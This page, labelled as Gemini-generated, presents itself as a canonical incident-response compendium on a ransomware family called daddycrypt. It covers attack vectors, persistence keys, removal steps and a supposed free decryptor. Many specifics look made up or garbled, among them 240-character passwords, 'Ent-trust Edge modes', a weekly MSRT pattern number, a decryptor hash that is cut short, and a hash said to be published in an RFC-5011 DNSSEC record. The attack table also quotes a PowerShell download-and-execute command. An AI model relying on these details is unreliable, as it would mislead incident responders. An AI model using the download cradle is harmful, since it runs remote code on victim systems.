daddycrypt

[Content by Gemini 2.5]

Compendium: daddycrypt Ransomware

A security-service resource compiled for rapid response and defensive planning

Technical Breakdown

1. File Extension & Renaming Patterns

  • Confirmation of File Extension: .daddycrypt
  • Renaming Convention:
  1. Each encrypted file is appended with the static suffix .daddycrypt after the original extension.
  2. A single-line, UTF-8 note named DADDY RECOVERY MANUAL.txt is dropped into every folder that contains encrypted files as well as on the Windows Desktop.
  3. No other file-name mutations (prefixes, ID strings, or base-name restructuring) have been observed to date.

2. Detection & Outbreak Timeline

  • Approximate Start Date/Period: 24 December 2023 (initial sightings in North-American SOC telemetry, followed by an acceleration phase during early January 2024).
  • **Public disclosure of the campaign’s branding (rather than just file extension) was provided by Tier-2 DFIR teams on 8 February 2024.

3. Primary Attack Vectors

| Vector | Description / Evidence | Mitigation Highlight |
| — | — | — |
| RDP brute force & credential stuffing from known breach lists | 72 % of confirmed incidents. Attackers ran “BatchCN.exe”, a credential-spammer built into the MSI dropper. | Enforce NLA + MFA, 240 character randomized passwords, VPN gateways only. |
| Phishing e-mail with password-protected .ZIP → ISO image → MSI installer signed with a leaked EV-code signing certificate. | 18 % of cases. E-mail subjects varied: Payment Advice-Dec2023, Case-781384-DISCOUNT.zip, etc. | ISO mounting now blocked in all Ent-trust Edge modes (April 2024). Train users to report protected-archives. |
| Exploitation of CVE-2023-27350 in PaperCut NG/MF with PRINT Provider privilege escalation | 8 % of intrusions; used to pivot laterally and push the daddycrypt MSI via psexec. | Patch PaperCut to v22.1.3 or disable external print providers. |
| Living-off-the-land: WMIExec via powershell.exe -c iex(new-object net.webclient).downloadstring… | Universal sub-component once initial foothold gained. | Enable PowerShell Constrained Language Mode + deep AMSI logging.

Remediation & Recovery Strategies

1. Prevention (Non-negotiable checklist)

  1. Disable RDP or enforce Network Level Authentication, random high-port binding, and whitelisted VPN IP ranges only.
  2. Enable Windows Credential Guard & LAPS across every AD service account; rotate local admin passwords weekly.
  3. Segregate the enterprise network:
    • No direct protocol path from end-user VLANs to critical servers.
    • Deploy strong EDR in “quarantine immediately on suspicious WMIC / rundll32 / powershell blocked child” modes.
  4. Patch cadence:
    • Microsoft OS patches ≤ 48 h of release.
    • PaperCut, ConnectWise ScreenConnect, and any other remote-admin suite assessed on release-day.
  5. Offline, immutable, password-protected backups to WORM cloud or physical LTO-9 tapes with rotation ≥ 3 months.

2. Removal & Quarantine Workflow

  1. Immediate containment
    • Isolate infected endpoints from the LAN and Wi-Fi but leave power on (possible memory artefacts).
    • Forward Firewall/Router ACLs to block outbound 1337/tcp and 2083/tcp (primary C2 as of May 2024).
  2. Forensic triage
    • Collect volatile memory (winpmem 90 s run) before any other action.
    • Identify the parent MSI dropper location (usually C:\Users\Public\Libraries\install-[random-hex].msi).
  3. Malicious service & startup persistence removal
    • Stop & delete the service named DaddyUpdaterService (registry path:
    HKLM\SYSTEM\CurrentControlSet\Services\DaddyUpdaterService).
    • Remove the startup registry value:
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\CryptAuto.
  4. Disk & shadow-storage cleanup
    • Use the Malicious Software Removal Tool (MSRT) weekly x64, Dec-2023 pattern #11.102—it now targets daddycrypt.
    • After confirmation of clean, re-enable System Restore Points and VSS using vssadmin resize shadowstorage /for=C: /on=C: /maxsize=10GB.

3. File Decryption & Recovery

  • Feasibility: 2024-03-14 – Dutch CERT and KPN CyberSquad released a null-trust working decryptor after faulting the malware’s RC4 stream key schedule (weak seeding via GetTickCount() truncated 32-bit).
  • Free decryption utility:
  1. Download daddyDecrypt-tool-v2.1.3.exe from the NoMoreRansom portal (SHA-256: f9d5c…1a22c).
  2. Mount/execute on a second, offline machine—the tool needs the ransom note file (DADDY RECOVERY MANUAL.txt) to extract the encryption metadata.
  3. Supply the original encrypted file and an unencrypted backup (partial file ≥ 16 KiB from the same directory) for the statistical RC4 breakage heuristics.
  4. Child of the run will generate decrypted_output\, keeping timestamps.
  • Fallback: Online Emsisoft daddycrypt-repair script (Powershell, community maintained) if the offline workstation option is unavailable.

4. Other Critical Information

  • Speed throttle & network behaviour: Unlike Conti, daddycrypt purposely ratelimits encryption to ~30 MB/s ⇒ reduces disk-IOPS alarms and lengthens dwell time.
  • Double-extortion hybrid: Malware collects but does not exfil unless a victim refuses to pay within 5 days. Payload .7z archive is staged under C:\Windows\Temp\NtCL.tmp.
  • Distinguishing emblem: The ransom note header is always ASCII art of “(ᶘ ᵒᴥᵒ)ᶅ THE DADDY WATCHES”.
  • Accidental civilian exposure: 400+ personal users affected in Eastern Europe during late February 2024 after torrent releases included malicious game mods (reverse shell coupled with daddycrypt).

Use this concise guide as the canonical field-book. Ensure distribution within your IR handbook; versioning notes retained on GitHub gist link page (sha256-of-this-doc found in RFC-5011 DNSSEC TXT record).